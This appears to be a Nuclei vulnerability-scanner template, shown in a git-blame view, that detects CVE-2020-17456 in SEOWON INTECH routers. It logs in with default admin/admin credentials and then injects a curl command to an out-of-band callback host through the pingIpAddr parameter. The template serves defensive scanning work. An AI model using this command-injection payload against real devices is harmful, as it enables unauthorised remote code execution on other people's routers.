2022-03-15 10:13:50 +00:00
|
|
|
id: CVE-2020-17456
|
|
|
|
|
|
|
|
info:
|
2022-04-29 19:58:07 +00:00
|
|
|
name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution
|
2022-03-28 11:05:16 +00:00
|
|
|
author: gy741,edoardottt
|
2022-03-15 10:13:50 +00:00
|
|
|
severity: critical
|
2022-05-17 09:18:12 +00:00
|
|
|
description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.
|
2022-03-15 10:13:50 +00:00
|
|
|
reference:
|
|
|
|
- https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/
|
2022-03-15 11:06:08 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-17456
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html
|
2022-03-21 12:12:32 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2022-03-21 12:12:32 +00:00
|
|
|
cve-id: CVE-2020-17456
|
|
|
|
cwe-id: CWE-78
|
2023-04-12 10:55:48 +00:00
|
|
|
epss-score: 0.97283
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2022-03-15 10:13:50 +00:00
|
|
|
|
2023-03-29 11:07:38 +00:00
|
|
|
variables:
|
2023-03-29 14:11:27 +00:00
|
|
|
useragent: '{{rand_base(6)}}'
|
2023-03-29 11:07:38 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-03-15 10:13:50 +00:00
|
|
|
- raw:
|
2022-03-15 11:06:08 +00:00
|
|
|
- |
|
|
|
|
POST /cgi-bin/login.cgi HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
Referer: {{BaseURL}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin
|
2022-03-15 10:13:50 +00:00
|
|
|
- |
|
|
|
|
POST /cgi-bin/system_log.cgi HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2023-03-29 13:54:19 +00:00
|
|
|
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
2022-03-28 11:05:16 +00:00
|
|
|
|
2022-03-15 11:06:08 +00:00
|
|
|
cookie-reuse: true
|
2022-03-28 11:05:16 +00:00
|
|
|
matchers-condition: and
|
2022-03-15 10:13:50 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "http"
|
2022-03-28 11:05:16 +00:00
|
|
|
|
2023-03-29 10:17:09 +00:00
|
|
|
- type: word
|
|
|
|
part: interactsh_request
|
|
|
|
words:
|
2023-03-29 13:54:19 +00:00
|
|
|
- "User-Agent: {{useragent}}"
|
2023-03-29 10:17:09 +00:00
|
|
|
|
2022-03-28 11:05:16 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-04-29 19:58:07 +00:00
|
|
|
- 200
|
|
|
|
|
|
|
|
# Enhanced by mp on 2022/04/27
|